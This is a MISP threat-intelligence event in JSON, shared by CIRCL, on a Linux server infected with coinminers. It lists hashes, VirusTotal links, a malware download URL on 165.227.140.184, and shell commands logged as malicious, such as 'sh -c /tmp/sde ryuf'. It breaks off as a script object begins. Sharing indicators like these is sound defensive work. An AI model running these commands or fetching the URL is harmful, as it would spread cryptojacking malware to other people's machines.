1293 lines
706 KiB
JSON
1293 lines
706 KiB
JSON
|
{
|
||
|
"Event": {
|
||
|
"analysis": "1",
|
||
|
"date": "2019-06-01",
|
||
|
"extends_uuid": "",
|
||
|
"info": "Linux server infection with coinminers (derived from original post with iptables rules)",
|
||
|
"publish_timestamp": "1559381195",
|
||
|
"published": true,
|
||
|
"threat_level_id": "3",
|
||
|
"timestamp": "1559381168",
|
||
|
"uuid": "5cf22f74-759c-4744-90eb-4300950d210f",
|
||
|
"Orgc": {
|
||
|
"name": "CIRCL",
|
||
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
||
|
},
|
||
|
"Tag": [
|
||
|
{
|
||
|
"colour": "#004646",
|
||
|
"name": "type:OSINT"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0071c3",
|
||
|
"name": "osint:lifetime=\"perpetual\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0087e8",
|
||
|
"name": "osint:certainty=\"50\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#ffffff",
|
||
|
"name": "tlp:white"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:malpedia=\"Coinminer\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:tool=\"CoinMiner\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\""
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cf22f90-03e4-42e8-ad21-46e2950d210f",
|
||
|
"value": "2cb968c8d33d89af2ec03df8fd875ab6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cf23560-1a54-4bd1-b253-4cbc950d210f",
|
||
|
"value": "0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559377496",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf23658-5858-45ec-bd98-437b950d210f",
|
||
|
"value": "http://165.227.140.184/tmp/nww"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559380507",
|
||
|
"to_ids": false,
|
||
|
"type": "attachment",
|
||
|
"uuid": "5cf2421b-bba0-4844-8d28-43c9950d210f",
|
||
|
"value": "liu.png"
|
||
|
}
|
||
|
],
|
||
|
"Object": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame.",
|
||
|
"meta-category": "network",
|
||
|
"name": "ip-port",
|
||
|
"template_uuid": "9f8cea74-16fe-4968-a2b4-026676949ac6",
|
||
|
"template_version": "8",
|
||
|
"timestamp": "1559375804",
|
||
|
"uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ip",
|
||
|
"timestamp": "1559375804",
|
||
|
"to_ids": true,
|
||
|
"type": "ip-dst",
|
||
|
"uuid": "5cf22fbc-4a28-4256-8c9f-4f60950d210f",
|
||
|
"value": "165.227.140.184"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "dst-port",
|
||
|
"timestamp": "1559375804",
|
||
|
"to_ids": false,
|
||
|
"type": "port",
|
||
|
"uuid": "5cf22fbc-5c68-4ac7-a967-484d950d210f",
|
||
|
"value": "80"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "15",
|
||
|
"timestamp": "1559377163",
|
||
|
"uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"referenced_uuid": "35f44d09-4103-4f11-a1dd-74fb99172734",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1559375857",
|
||
|
"uuid": "5cf22ff1-e134-4c0e-8da7-4374950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"referenced_uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"relationship_type": "connects-to",
|
||
|
"timestamp": "1559375901",
|
||
|
"uuid": "5cf2301d-6b34-4b80-95fd-4cf9950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"referenced_uuid": "5cf234e6-2cd4-43cc-8337-4fa1950d210f",
|
||
|
"relationship_type": "executes",
|
||
|
"timestamp": "1559377163",
|
||
|
"uuid": "5cf2350b-247c-49e8-8237-4325950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "9dae9dca-70fd-41e0-a6ae-2622709fc9fb",
|
||
|
"value": "2cb968c8d33d89af2ec03df8fd875ab6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "d52ff6b2-ee13-4cfc-a5ca-2bcdcb5c7b8b",
|
||
|
"value": "535fd49cf76e48d610f2e80d0ce16d722ba6b949"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "6882da9a-5880-4205-8200-8223b7548849",
|
||
|
"value": "7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1559375857",
|
||
|
"uuid": "35f44d09-4103-4f11-a1dd-74fb99172734",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "ab588995-f90a-4487-8efd-ec53c6e3fdfd",
|
||
|
"value": "2019-02-25T10:14:54"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "dc266a97-294a-48dd-9ea8-4e2d3ec4f8e4",
|
||
|
"value": "https://www.virustotal.com/file/7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805/analysis/1551089694/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "c278894e-a2a2-40aa-8ae3-ec6d45acc2e9",
|
||
|
"value": "6/53"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a series of shell commands executed. This object can be linked with malicious files in order to describe a specific execution of shell commands.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "shell-commands",
|
||
|
"template_uuid": "fee65efa-eb64-4516-8611-1db76c589f79",
|
||
|
"template_version": "1",
|
||
|
"timestamp": "1559377126",
|
||
|
"uuid": "5cf234e6-2cd4-43cc-8337-4fa1950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-4da8-49b5-b064-4e40950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-ee88-4671-90c3-4ee5950d210f",
|
||
|
"value": "Malicious"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-c614-47da-a863-46e8950d210f",
|
||
|
"value": "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-9c48-4372-bab4-42b0950d210f",
|
||
|
"value": "sh -c /var/tmp/sde ryuf"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-abec-4654-a935-4354950d210f",
|
||
|
"value": "sh -c /tmp/sde ryuf"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "15",
|
||
|
"timestamp": "1559377451",
|
||
|
"uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"referenced_uuid": "49e52bb6-f81f-4516-99e4-e2e04f1c0bc7",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1559377259",
|
||
|
"uuid": "5cf2356b-b850-49d4-bc56-4f04950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"referenced_uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"relationship_type": "connects-to",
|
||
|
"timestamp": "1559377324",
|
||
|
"uuid": "5cf235ac-f414-4fb9-bf42-4fcb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"referenced_uuid": "5cf235f9-14d0-4bcf-9d72-4b5f950d210f",
|
||
|
"relationship_type": "executes",
|
||
|
"timestamp": "1559377451",
|
||
|
"uuid": "5cf2362b-3634-47b1-b963-42bb950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "106a8aa1-06b1-4f11-beb5-57962285e6ea",
|
||
|
"value": "3694010708de4a2c916e34cbe2a0ed60"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "9332298e-7763-4b34-8004-e24853631adc",
|
||
|
"value": "6faf93653c6f64d7aa814c878fed112a6db992f6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "1fc98d1a-6c44-4bc1-b1a8-55740185342c",
|
||
|
"value": "0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1559377259",
|
||
|
"uuid": "49e52bb6-f81f-4516-99e4-e2e04f1c0bc7",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "266fe354-b65d-425a-9c9e-3544e0c5a9f1",
|
||
|
"value": "2019-02-10T19:49:48"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "e4df3142-d2dd-48ed-81d8-dada676b54e3",
|
||
|
"value": "https://www.virustotal.com/file/0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72/analysis/1549828188/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "a64f16e1-a212-4a8f-ba03-dbc5fed0c2bd",
|
||
|
"value": "1/58"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a series of shell commands executed. This object can be linked with malicious files in order to describe a specific execution of shell commands.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "shell-commands",
|
||
|
"template_uuid": "fee65efa-eb64-4516-8611-1db76c589f79",
|
||
|
"template_version": "1",
|
||
|
"timestamp": "1559377401",
|
||
|
"uuid": "5cf235f9-14d0-4bcf-9d72-4b5f950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-bef4-4265-ad47-48c2950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-9bfc-4e50-9433-44d2950d210f",
|
||
|
"value": "Malicious"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-a640-4b3b-8627-4592950d210f",
|
||
|
"value": "atd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-91cc-411f-8124-4241950d210f",
|
||
|
"value": "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "script",
|
||
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
||
|
"template_version": "4",
|
||
|
"timestamp": "1559378537",
|
||
|
"uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf23717-673c-48de-9834-476d950d210f",
|
||
|
"relationship_type": "downloads",
|
||
|
"timestamp": "1559377717",
|
||
|
"uuid": "5cf23735-ffb0-45e3-97b5-46ff950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf237b6-06bc-4e57-ad7e-31bb950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1559377880",
|
||
|
"uuid": "5cf237d8-c198-49a5-b228-40e7950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf2397c-b0a0-475d-b764-4c2a950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1559378349",
|
||
|
"uuid": "5cf239ad-449c-4123-b6d6-42c6950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf23a31-1db8-4b41-81af-4416950d210f",
|
||
|
"relationship_type": "abuses",
|
||
|
"timestamp": "1559378537",
|
||
|
"uuid": "5cf23a69-a250-42a8-98a0-4fba950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "script",
|
||
|
"timestamp": "1559377640",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf236e8-f01c-49ec-b1f0-4d88950d210f",
|
||
|
